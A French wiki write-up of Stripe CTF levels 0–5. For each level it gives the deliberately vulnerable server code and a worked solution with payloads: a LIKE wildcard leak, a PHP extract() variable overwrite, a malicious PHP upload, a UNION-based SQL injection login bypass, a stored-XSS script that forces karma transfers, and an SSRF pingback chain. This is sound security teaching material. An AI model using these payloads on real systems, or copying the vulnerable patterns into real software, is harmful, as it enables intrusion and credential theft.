Outils d'utilisateurs
stripe_ctf
Ceci est une ancienne révision du document !
Level 0
Enonce
We'll start you out with Level 0, the Secret Safe. The Secret Safe is designed as a secure place to store all of your secrets.
It turns out that the password to access Level 1 is stored within the Secret Safe. If only you knew how to crack safes…
You can access the Secret Safe at https://level00-1.stripe-ctf.com/user-kfsvkinufw.
The Safe's code is included below, and can also be obtained via git clone https://level00-1.stripe-ctf.com/user-kfsvkinufw/level00-code.
Code
Here's the code for level00.js, the main server file:
// Install dependencies with 'npm install' // Run as 'node level00.js' var express = require('express'), // Web framework mu = require('mu2'), // Mustache.js templating sqlite3 = require('sqlite3'); // SQLite (database) driver // Look for templates in the current directory mu.root = __dirname; // Set up the DB var db = new sqlite3.Database('level00.db'); db.run( 'CREATE TABLE IF NOT EXISTS secrets (' + 'key varchar(255),' + 'secret varchar(255)' + ')' ); // Create the server var app = express(); app.use(express.bodyParser()); function renderPage(res, variables) { var stream = mu.compileAndRender('level00.html', variables); res.header('Content-Type', 'text/html'); stream.pipe(res); } app.get('/*', function(req, res) { var namespace = req.param('namespace'); if (namespace) { var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"'; db.all(query, namespace, function(err, secrets) { if (err) throw err; renderPage(res, {namespace: namespace, secrets: secrets}); }); } else { renderPage(res, {}); } }); app.post('/*', function(req, res) { var namespace = req.body['namespace']; var secret_name = req.body['secret_name']; var secret_value = req.body['secret_value']; var query = 'INSERT INTO secrets (key, secret) VALUES (? || "." || ?, ?)'; db.run(query, namespace, secret_name, secret_value, function(err) { if (err) throw err; res.header('Content-Type', 'text/html'); res.redirect(req.path + '?namespace=' + namespace); }); }); if (process.argv.length > 2) { var socket = process.argv[2]; console.log("Starting server on UNIX socket " + socket); app.listen(socket); } else { console.log("Starting server at http://localhost:3000/"); app.listen(3000); }
And here's the code for level00.html, its mustache.js template:
<html> <head> <title>Secret Safe</title> </head> <body> {{#namespace}} <div style="border-width: 2px; border-style: outset; padding: 5px"> Showing secrets for <strong>{{namespace}}</strong>: <table> <thead> <tr> <th>Key</th> <th>Value</th> </tr> </thead> <tbody> {{#secrets}} <tr> <td>{{ key }}</td> <td>{{ secret }}</td> </tr> {{/secrets}} {{^secrets}} <tr> <td span="2"> You have no secrets stored with us. Try using the form below. </td> </tr> {{/secrets}} </tbody> </table> <hr /> </div> {{/namespace}} <form action="" method="POST"> <p> <label for="namespace">Namespace:</label> <input type="text" name="namespace" id="namespace" value="{{ namespace }}" /> </p> <p> <label for="secret_name">Name of your secret:</label> <input type="text" name="secret_name" id="secret_name"> </p> <p> <label for="secret_value">Your secret:</label> <input type="password" name="secret_value" id="secret_value"> </p> <p> <input type="submit" value="Store my secret!" /> </p> </form> <form action="" method="GET"> <label for="change_namespace"> Want to retrieve your secrets? View secrets for: </label> <input name="namespace" id="change_namespace" /> <input type="submit" value="View" /> </form> </body> </html>
Solution
Pour ajouter un secret, il faut definir le namespace, une cle et une valeur, secret qui sera stocké sous la forme key = namespace.cle et secret = valeur
app.post('/*', function(req, res) { var namespace = req.body['namespace']; var secret_name = req.body['secret_name']; var secret_value = req.body['secret_value']; var query = 'INSERT INTO secrets (key, secret) VALUES (? || "." || ?, ?)'; db.run(query, namespace, secret_name, secret_value, function(err) {
La requete GET pour afficher les secrets requiert un parametre, le namespace et est construite avec
app.get('/*', function(req, res) { var namespace = req.param('namespace'); if (namespace) { var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"'; db.all(query, namespace, function(err, secrets) {
Cette requete affiche donc tous les secrets du namespace passé en argument. Il suffit d'utiliser % comme parametre pour afficher tous les secrets de tous les namespaces et donc le mot de passe.
Level 1
Enonce
Excellent, you are now on Level 1, the Guessing Game. All you have to do is guess the combination correctly, and you'll be given
the password to access Level 2! We've been assured that this level has no security vulnerabilities in it
(and the machine running the Guessing Game has no outbound network connectivity, meaning you wouldn't be able to extract the password anyway), so >you'll probably just have to try all the possible combinations. Or will you…?
You can play the Guessing Game at https://level01-2.stripe-ctf.com/user-ntyjkglswi. The code for the Game can be obtained from
git clone https://level01-2.stripe-ctf.com/user-ntyjkglswi/level01-code, and is also included below.
Code
The contents of index.php
<html> <head> <title>Guessing Game</title> </head> <body> <h1>Welcome to the Guessing Game!</h1> <p> Guess the secret combination below, and if you get it right, you'll get the password to the next level! </p> <?php $filename = 'secret-combination.txt'; extract($_GET); if (isset($attempt)) { $combination = trim(file_get_contents($filename)); if ($attempt === $combination) { echo "<p>How did you know the secret combination was" . " $combination!?</p>"; $next = file_get_contents('level02-password.txt'); echo "<p>You've earned the password to the access Level 2:" . " $next</p>"; } else { echo "<p>Incorrect! The secret combination is not $attempt</p>"; } } ?> <form action="#" method="GET"> <p><input type="text" name="attempt"></p> <p><input type="submit" value="Guess!"></p> </form> </body> </html>
Solution
Le code php prend l'input de la requete GET attempt en utilisant la methode extract(_GET). Ensuite le serveur lit le contenu du fichier $filename. Si le parametre attempt est egal au contenu du fichier $filename, le mot de passe est affiche.
L'ordre dans lequel le serveur definit le fichier a lire et le lit est important. En effet, la variable $filename est initialisee, puis les parametres de la requete GET sont lus et finalement le contenu du fichier est lu. En ajoutant a la requete GET un parametre filename, ce parametre va remplacer le contenu de la variable $filename par le nom de notre fichier. Il ne reste plus qu'a trouver un fichier dont on connait le contenu, par exemple
Level 2
Enonce
You are now on Level 2, the Social Network. Excellent work so far! Social Networks are all the rage these days,
so we decided to build one for CTF. Please fill out your profile at https://level02-3.stripe-ctf.com/user-zjfpnuykfi.
You may even be able to find the password for Level 3 by doing so.
The code for the Social Network can be obtained from git clone https://level02-3.stripe-ctf.com/user-zjfpnuykfi/level02-code,
and is also included below.
Code
The contents of index.php
<?php session_start(); if ($_FILES["dispic"]["error"] > 0) { echo "<p>Error: " . $_FILES["dispic"]["error"] . "</p>"; } else { $dest_dir = "uploads/"; $dest = $dest_dir . basename($_FILES["dispic"]["name"]); $src = $_FILES["dispic"]["tmp_name"]; if (move_uploaded_file($src, $dest)) { $_SESSION["dispic_url"] = $dest; chmod($dest, 0644); echo "<p>Successfully uploaded your display picture.</p>"; } } $url = "https://upload.wikimedia.org/wikipedia/commons/f/f8/" . "Question_mark_alternate.svg"; if (isset($_SESSION["dispic_url"])) { $url = $_SESSION["dispic_url"]; } ?> <html> <head> <title>Welcome to the CTF!</title> </head> <body> <center> <h1>Welcome to the CTF Social Network!</h1> <div> <img src=<?php echo $url; ?> /> <?php if (!isset($_SESSION["dispic_url"])) { echo "<p>Oh, looks like you don't have a profile image" . " -- upload one now!</p>"; } ?> <form action="" method="post" enctype="multipart/form-data"> <input type="file" name="dispic" size="40" /> <input type="submit" value="Upload!"> </form> <p> Password for Level 3 (accessible only to members of the club): <a href="password.txt">password.txt</a> </p> </div> </center> </body> </html>
Solution
En cliquant sur le lien contenant le mot de passe, on obtient un 403 Forbidden. L'application permet d'uploader une image pour son profil. En analysant le code source, on s'apercoit qu'il n'y a aucune verification faite par le serveur et que l'on peut uploader n'importe quel fichier qui sera stocke dans le sous-repertoire uploads. Il suffit donc d'uploader un fichier php qui lira le contenu du fichier password.txt et l'affiche puis de l'appeler directement
<?php $combination = file_get_contents('../password.txt'); echo "$combination" ?>
Level 3
Enonce
After the fiasco back in Level 0, management has decided to fortify the Secret Safe into an unbreakable solution (kind of like Unbreakable Linux). >The resulting product is Secret Vault, which is so secure that it requires human intervention to add new secrets.
A beta version has launched with some interesting secrets (including the password to access Level 4); you can check it out at >https://level03-1.stripe-ctf.com/user-odmhvomxhm. As usual, you can fetch the code for the level (and some sample data) via git clone >https://level03-1.stripe-ctf.com/user-odmhvomxhm/level03-code, or you can read the code below.
Code
The source of the server, secretvault.py, is:
#!/usr/bin/env python # # Welcome to the Secret Safe! # # - users/users.db stores authentication info with the schema: # # CREATE TABLE users ( # id VARCHAR(255) PRIMARY KEY AUTOINCREMENT, # username VARCHAR(255), # password_hash VARCHAR(255), # salt VARCHAR(255) # ); # # - For extra security, the dictionary of secrets lives # data/secrets.json (so a compromise of the database won't # compromise the secrets themselves) import flask import hashlib import json import logging import os import sqlite3 import subprocess import sys from werkzeug import debug # Generate test data when running locally data_dir = os.path.join(os.path.dirname(__file__), 'data') if not os.path.exists(data_dir): import generate_data os.mkdir(data_dir) generate_data.main(data_dir, 'dummy-password', 'dummy-proof', 'dummy-plans') secrets = json.load(open(os.path.join(data_dir, 'secrets.json'))) index_html = open('index.html').read() app = flask.Flask(__name__) # Turn on backtraces, but turn off code execution (that'd be an easy level!) app.config['PROPAGATE_EXCEPTIONS'] = True app.wsgi_app = debug.DebuggedApplication(app.wsgi_app, evalex=False) app.logger.addHandler(logging.StreamHandler(sys.stderr)) # use persistent entropy file for secret_key app.secret_key = open(os.path.join(data_dir, 'entropy.dat')).read() # Allow setting url_root if needed try: from local_settings import url_root except ImportError: pass def absolute_url(path): return url_root + path @app.route('/') def index(): try: user_id = flask.session['user_id'] except KeyError: return index_html else: secret = secrets[str(user_id)] return (u'Welcome back! Your secret is: "{0}"'.format(secret) + u' (<a href="./logout">Log out</a>)\n') @app.route('/logout') def logout(): flask.session.pop('user_id', None) return flask.redirect(absolute_url('/')) @app.route('/login', methods=['POST']) def login(): username = flask.request.form.get('username') password = flask.request.form.get('password') if not username: return "Must provide username\n" if not password: return "Must provide password\n" conn = sqlite3.connect(os.path.join(data_dir, 'users.db')) cursor = conn.cursor() query = """SELECT id, password_hash, salt FROM users WHERE username = '{0}' LIMIT 1""".format(username) cursor.execute(query) res = cursor.fetchone() if not res: return "There's no such user {0}!\n".format(username) user_id, password_hash, salt = res calculated_hash = hashlib.sha256(password + salt) if calculated_hash.hexdigest() != password_hash: return "That's not the password for {0}!\n".format(username) flask.session['user_id'] = user_id return flask.redirect(absolute_url('/')) if __name__ == '__main__': # In development: app.run(debug=True) app.run()
And here's index.html, the HTML file it's serving:
<html> <body> <p> Welcome to the Secret Safe, a place to guard your most precious secrets! To retreive your secrets, log in below. </p> <p>The current users of the system store the following secrets:</p> <ul> <li>bob: Stores the password to access level 04</li> <li>eve: Stores the proof that P = NP </li> <li>mallory: Stores the plans to a perpetual motion machine </li> </ul> <p> You should use it too! <a href="http://www.youtube.com/watch?v=oHg5SJYRHA0">Contact us</a> to request a beta invite. </p> <form method="POST" action="./login"> <p> <label for="username">Username:</label> <input type="text" name="username" id="username"> </p> <p> <label for="password">Password:</label> <input type="password" name="password" id="password"> </p> <input type="submit" value="Recover your secrets now!"> </form> </body> </html>
Solution
Le mot de passe est le secret de bob. Il faut donc essayer de se connecter en tant que bob. Si on regarde comment est fait le login
query = """SELECT id, password_hash, salt FROM users WHERE username = '{0}' LIMIT 1""".format(username) cursor.execute(query) res = cursor.fetchone() if not res: return "There's no such user {0}!\n".format(username) user_id, password_hash, salt = res calculated_hash = hashlib.sha256(password + salt) if calculated_hash.hexdigest() != password_hash: return "That's not the password for {0}!\n".format(username)
il y a une requete faite pour voir si l'utilisateur existe dans la bdd et ensuite le hash du mot de passe + salt est compare a la valeur sauvegardee. On ne connait ni le mot de passe de bob, ni le salt, on va donc essayer de modifier la requete SQL pour qu'elle nous rende des valeurs que l'on aura fixees. Par exemple, on aimerait bien avoir a comme mot de passe et a comme salt. On calcule le hash du mot de passe et du salt
import hashlib password = 'a' salt = 'a' calculated_hash = hashlib.sha256(password + salt) print calculated_hash.hexdigest()
ce qui nous donne 961b6dd3ede3cb8ecbaacbd68de040cd78eb2ed5889130cceb4c49268ea4d506
Il ne nous reste plus qu'a manipuler la requete SQL pour que le premier resultat (a cause de LIMIT 1) contienne les bonnes valeurs (ie l'id de bob, le password_hash calcule et le salt choisi)
On utilise donc comme utilisateur aaa' union select id,”961b6dd3ede3cb8ecbaacbd68de040cd78eb2ed5889130cceb4c49268ea4d506”, “a” from users where username = 'bob et comme mot de passe a
Level 4
Enonce
The Karma Trader is the world's best way to reward people for good deeds: https://level04-2.stripe-ctf.com/user-xuqitemtqa.
You can sign up for an account, and start transferring karma to people who you think are doing good in the world.
In order to ensure you're transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.
The very active user karma_fountain has infinite karma, making it a ripe account to obtain
(no one will notice a few extra karma trades here and there). The password for karma_fountain's account will give you access to Level 5.
You can obtain the full, runnable source for the Karma Trader from git clone https://level04-2.stripe-ctf.com/user-xuqitemtqa/level04-code.
We've included the most important files below.
Code
The contents of srv.rb
#!/usr/bin/env ruby require 'yaml' require 'set' require 'rubygems' require 'bundler/setup' require 'sequel' require 'sinatra' module KarmaTrader PASSWORD = File.read('password.txt').strip STARTING_KARMA = 500 KARMA_FOUNTAIN = 'karma_fountain' # Only needed in production URL_ROOT = File.read('url_root.txt').strip rescue '' module DB def self.db_file 'karma.db' end def self.conn @conn ||= Sequel.sqlite(db_file) end def self.init return if File.exists?(db_file) File.umask(0066) conn.create_table(:users) do primary_key :id String :username String :password Integer :karma Time :last_active end conn.create_table(:transfers) do primary_id :id String :from String :to Integer :amount end # Karma Fountain has infinite karma, so just set it to -1 conn[:users].insert( :username => KarmaTrader::KARMA_FOUNTAIN, :password => KarmaTrader::PASSWORD, :karma => -1, :last_active => Time.now.utc ) end end class KarmaSrv < Sinatra::Base set :environment, :production enable :sessions # Use persistent entropy file entropy_file = 'entropy.dat' unless File.exists?(entropy_file) File.open(entropy_file, 'w') do |f| f.write(OpenSSL::Random.random_bytes(24)) end end set :session_secret, File.read(entropy_file) helpers do def absolute_url(path) KarmaTrader::URL_ROOT + path end end # Hack to make this work with a URL root def redirect(url) super(absolute_url(url)) end def die(msg, view) @error = msg halt(erb(view)) end before do refresh_state update_last_active end def refresh_state @user = logged_in_user @transfers = transfers_for_user @trusts_me = trusts_me @registered_users = registered_users end def update_last_active return unless @user DB.conn[:users].where(:username => @user[:username]). update(:last_active => Time.now.utc) end def logged_in_user return unless username = session[:user] DB.conn[:users][:username => username] end def transfers_for_user return [] unless @user DB.conn[:transfers].where( Sequel.or(:from => @user[:username], :to => @user[:username]) ) end def trusts_me trusts_me = Set.new return trusts_me unless @user # Get all the users who have transferred credits to me DB.conn[:transfers].where(:to => @user[:username]). join(:users, :username => :from).each do |result| trusts_me.add(result[:username]) end trusts_me end def registered_users KarmaTrader::DB.conn[:users].reverse_order(:id) end # KARMA_FOUNTAIN gets all the karma it wants. (Part of why getting # its password would be so great...) def user_has_infinite_karma? @user[:username] == KARMA_FOUNTAIN end get '/' do if @user erb :home else erb :login end end get '/register' do erb :register end post '/register' do username = params[:username] password = params[:password] unless username && password die("Please specify both a username and a password.", :register) end unless username =~ /^\w+$/ die("Invalid username. Usernames must match /^\w+$/", :register) end unless DB.conn[:users].where(:username => username).count == 0 die("This username is already registered. Try another one.", :register) end DB.conn[:users].insert( :username => username, :password => password, :karma => STARTING_KARMA, :last_active => Time.now.utc ) session[:user] = username redirect '/' end get '/login' do redirect '/' end post '/login' do username = params[:username] password = params[:password] user = DB.conn[:users][:username => username, :password => password] unless user die('Could not authenticate. Perhaps you meant to register a new' \ ' account? (See link below.)', :login) end session[:user] = user[:username] redirect '/' end get '/transfer' do redirect '/' end post '/transfer' do redirect '/' unless @user from = @user[:username] to = params[:to] amount = params[:amount] die("Please fill out all the fields.", :home) unless amount && to amount = amount.to_i die("Invalid amount specified.", :home) if amount <= 0 die("You cannot send yourself karma!", :home) if to == from unless DB.conn[:users][:username => to] die("No user with username #{to.inspect} found.", :home) end unless user_has_infinite_karma? if @user[:karma] < amount die("You only have #{@user[:karma]} karma left.", :home) end end DB.conn[:transfers].insert(:from => from, :to => to, :amount => amount) DB.conn[:users].where(:username=>from).update(:karma => :karma - amount) DB.conn[:users].where(:username=>to).update(:karma => :karma + amount) refresh_state @success = "You successfully transfered #{amount} karma to" + " #{to.inspect}." erb :home end get '/logout' do session.clear redirect '/' end end end def main KarmaTrader::DB.init KarmaTrader::KarmaSrv.run! end if $0 == __FILE__ main exit(0) end
The contents of views/home.erb:
<h1>Welcome to Karma Trader!</h1> <h3>Home</h3> <p>You are logged in as <%= @user[:username] %>.</p> <h3>Transfer karma</h3> <p> You have <%= @user[:karma] %> karma at the moment. Transfer karma to people who have done good deeds and you think will keep doing good deeds in the future. </p> <p> Note that transferring karma to someone will reveal your password to them, which will hopefully incentivize you to only give karma to people you really trust. </p> <p> If you're anything like <strong>karma_fountain</strong>, you'll find yourself logging in every minute to see what new and exciting developments are afoot on the platform. (Though no need to be as paranoid as <strong>karma_fountain</strong> and firewall your outbound network connections so you can only make connections to the Karma Trader server itself.) </p> <p>See below for a list of all registered usernames.</p> <form action="<%= absolute_url('/transfer') %>" method="POST"> <p>To: <input type="to" name="to" /></p> <p>Amount of karma: <input type="text" name="amount" /></p> <p><input type="submit" value="Submit" /></p> </form> <h3>Past transfers</h3> <table border="1"> <tr> <th>From</th> <th>To</th> <th>Amount</th> </tr> <% @transfers.each do |transfer| %> <tr> <td><%= transfer[:from] %></td> <td><%= transfer[:to] %></td> <td><%= transfer[:amount] %></td> </tr> <% end %> </table> <h3> Registered Users </h3> <ul> <% @registered_users.each do |user| %> <% last_active = user[:last_active].strftime('%H:%M:%S UTC') %> <% if @trusts_me.include?(user[:username]) %> <li> <%= user[:username] %> (password: <%= user[:password] %>, last active <%= last_active %>) </li> <% elsif user[:username] == @user[:username] %> <li> <%= user[:username] %> (<strong>you</strong>, last active <%= last_active %>) </li> <% else %> <li> <%= user[:username] %> (password: <i>[hasn't yet transferred karma to you]</i>, last active <%= last_active %>) </li> <% end %> <% end %> </ul> <p><a href="<%= absolute_url('/logout') %>">Log out</a></p>
The contents of views/login.erb:
<h1> Welcome to Karma Trader, the best way to reward people for good deeds! </h1> <h3>Login</h3> <form action="<%= absolute_url('/login') %>" method="POST"> <p>Username: <input type="text" name="username" /></p> <p>Password: <input type="password" name="password" /></p> <p><input type="submit" value="Log in" /></p> </form> <p> Don't have an account? <a href="<%= absolute_url('/register') %>">Register</a> now! </p>
The contents of views/register.erb:
<h1>Welcome to Karma Trader, the best way to reward people for good deeds!</h1> <h3>Register</h3> <form action="<%= absolute_url('/register') %>" method="POST"> <p>Pick your username: <input type="text" name="username" /></p> <p>Choose a password: <input type="password" name="password" /></p> <p><input type="submit" value="Create account" /></p> </form> <p>Already have an account? <a href="<%= absolute_url('/') %>">Log in</a> now!</p>
The contents of views/layout.erb:
<!doctype html>
<html>
<head>
<title>Karma Trader</title>
<script type="text/javascript"
src="<%= absolute_url('/js/jquery-1.8.0.min.js') %>"></script>
</head>
<body>
<% if @error %>
<p>Error: <%= @error %></p>
<% end %>
<% if @success %>
<p>Success: <%= @success %></p>
<% end %>
<%= yield %>
</body>
</html>
Solution
Apres avoir cree un account, on arrive sur la page principale qui affiche une form pour faire des transferts de karma ainsi que la liste des utilisteurs enregistres. Si ces derniers nous ont deja transfere du karma, leur mot de passe est affiche. Le mot de passe du niveau etant le mot de passe de l'utilisateur karma_fountain, il va falloir le convaincre de nous transferer du karma. Pour y parvenir, on va s'enregistrer avec un mot de passe specialement prepare de maniere a ce que lorsqu'on aura transfere du karma a karma_fountain, notre mot de passe sera affiche sur sa page et cela entrainera un transfert de karma vers notre compte et nous aurons son mot de passe.
Le script doit donc recuperer la forme, remplir les champs et la soumettre
<script> document.forms[0].to.value="mooh"; document.forms[0].amount.value=1; document.forms[0].submit(); </script>
On utilise donc par exemple mooh comme utilisateur, ce script comme mot de passe, on transfere 1 karma karma_fountain et on attend qu'il se connecte.
Level 5
Enonce
Many attempts have been made at creating a federated identity system for the web (see OpenID, for example).
However, none of them have been successful. Until today.
The DomainAuthenticator is based off a novel protocol for establishing identities.
To authenticate to a site, you simply provide it username, password, and pingback URL. The site posts your credentials
to the pingback URL, which returns either “AUTHENTICATED” or “DENIED”. If “AUTHENTICATED”, the site considers you signed in
as a user for the pingback domain.
You can check out the Stripe CTF DomainAuthenticator instance here: https://level05-2.stripe-ctf.com/user-afhnkxzjxh.
We've been using it to distribute the password to access Level 6. If you could only somehow authenticate as a user of a level05 machine…
To avoid nefarious exploits, the machine hosting the DomainAuthenticator has very locked down network access.
It can only make outbound requests to other stripe-ctf.com servers. Though, you've heard that someone forgot to internally firewall
off the high ports from the Level 2 server.
Interesting in setting up your own DomainAuthenticator? You can grab the source from
git clone https://level05-2.stripe-ctf.com/user-afhnkxzjxh/level05-code, or by reading on below.
Code
The contents of srv.rb
#!/usr/bin/env ruby require 'rubygems' require 'bundler/setup' require 'logger' require 'uri' require 'restclient' require 'sinatra' $log = Logger.new(STDERR) $log.level = Logger::INFO module DomainAuthenticator class DomainAuthenticatorSrv < Sinatra::Base set :environment, :production # Run with the production file on the server if File.exists?('production') PASSWORD_HOSTS = /^level05-\d+\.stripe-ctf\.com$/ ALLOWED_HOSTS = /\.stripe-ctf\.com$/ else PASSWORD_HOSTS = /^localhost$/ ALLOWED_HOSTS = // end PASSWORD = File.read('password.txt').strip enable :sessions # Use persistent entropy file entropy_file = 'entropy.dat' unless File.exists?(entropy_file) File.open(entropy_file, 'w') do |f| f.write(OpenSSL::Random.random_bytes(24)) end end set :session_secret, File.read(entropy_file) get '/*' do output = <<EOF <p> Welcome to the Domain Authenticator. Please authenticate as a user from your domain of choice. </p> <form action="" method="POST"> <p>Pingback URL: <input type="text" name="pingback" /></p> <p>Username: <input type="text" name="username" /></p> <p>Password: <input type="password" name="password" /></p> <p><input type="submit" value="Submit"></p> </form> EOF user = session[:auth_user] host = session[:auth_host] if user && host output += "<p> You are authenticated as #{user}@#{host}. </p>" if host =~ PASSWORD_HOSTS output += "<p> Since you're a user of a password host and all," output += " you deserve to know this password: #{PASSWORD} </p>" end end output end post '/*' do pingback = params[:pingback] username = params[:username] password = params[:password] pingback = "http://#{pingback}" unless pingback.include?('://') host = URI.parse(pingback).host unless host =~ ALLOWED_HOSTS return "Host not allowed: #{host}" \ " (allowed authentication hosts are #{ALLOWED_HOSTS.inspect})" end begin body = perform_authenticate(pingback, username, password) rescue StandardError => e return "An unknown error occurred while requesting #{pingback}: #{e}" end if authenticated?(body) session[:auth_user] = username session[:auth_host] = host return "Remote server responded with: #{body}." \ " Authenticated as #{username}@#{host}!" else session[:auth_user] = nil session[:auth_host] = nil sleep(1) # prevent abuse return "Remote server responded with: #{body}." \ " Unable to authenticate as #{username}@#{host}." end end def perform_authenticate(url, username, password) $log.info("Sending request to #{url}") response = RestClient.post(url, {:password => password, :username => username}) body = response.body $log.info("Server responded with: #{body}") body end def authenticated?(body) body =~ /[^\w]AUTHENTICATED[^\w]*$/ end end end def main DomainAuthenticator::DomainAuthenticatorSrv.run! end if $0 == __FILE__ main exit(0) end
Solution
On a un formulaire avec 3 champs, l'url pour le pingback, le username et le password. L'application va faire une requete au serveur dont l'url a ete donnee et en fonction du resultat, l'utilisateur sera authentifie sur ce serveur.
PASSWORD_HOSTS = /^level05-\d+\.stripe-ctf\.com$/ ALLOWED_HOSTS = /\.stripe-ctf\.com$/
On remarque que seuls les serveurs sur stripe-ctf.com sont permis. L'indice avec les high ports du serveur 2 est en fait un faux indice. C'est juste pour nous rappeler qu'il est possible d'uploader des fichiers sur ce serveur.
Pour etre authentifie, la reponse du serveur doit verifier:
def authenticated?(body) body =~ /[^\w]AUTHENTICATED[^\w]*$/ end
Si on upload le fichier suivant
<?php echo " AUTHENTICATED "; ?>
et on l'utilise directement comme adresse de pingback (https://level02-3.stripe-ctf.com/user-zjfpnuykfi/uploads/test3.php), l'application nous dit qu'on est bien authentifie. Malheureusement le mot de passe ne s'affiche pas car on est authentifie sur le serveur 02 et non 05
output += "<p> You are authenticated as #{user}@#{host}. </p>"
if host =~ PASSWORD_HOSTS
output += "<p> Since you're a user of a password host and all,"
output += " you deserve to know this password: #{PASSWORD} </p>"
end
Il faut donc que l'url du pingback serveur commence par level05. Et comme l'a fait remarque Mortis, en ruby params lit les parametre GET et POST. En utilisant comme url https://level05-2.stripe-ctf.com/user-afhnkxzjxh/?pingback=https://level02-3.stripe-ctf.com/user-zjfpnuykfi/uploads/test3.php, l'application va faire un double pingback. Il faut donc que la premiere requete vers le serveur 02 verifie la regex body =~ /[^\w]AUTHENTICATED[^\w]*$/. La reponse est de la forme: Server responded with: AUTHENTICATED …. Si on utilise le meme fichier, lors du second pingback, la reponse ne verifie plus la condition body =~ /[^\w]AUTHENTICATED[^\w]*$/ a cause du Server responded with sur la meme ligne. Il faut donc modifier le fichier php pour que cette condition soit aussi verifiee. En utilisant
<?php echo "\n"; echo " AUTHENTICATED "; echo "\n"; ?>
les 2 reponses des 2 pingbacks sont valides et l'application nous dit qu'on est authentifie sur le serveur 05 et affiche le mot de passe
Level 6
Level 7
Level 8
stripe_ctf.1346228123.txt.gz · Dernière modification: 2017/04/09 15:33 (modification externe)
Sauf mention contraire, le contenu de ce wiki est placé sous la licence suivante : CC Attribution-Share Alike 3.0 Unported
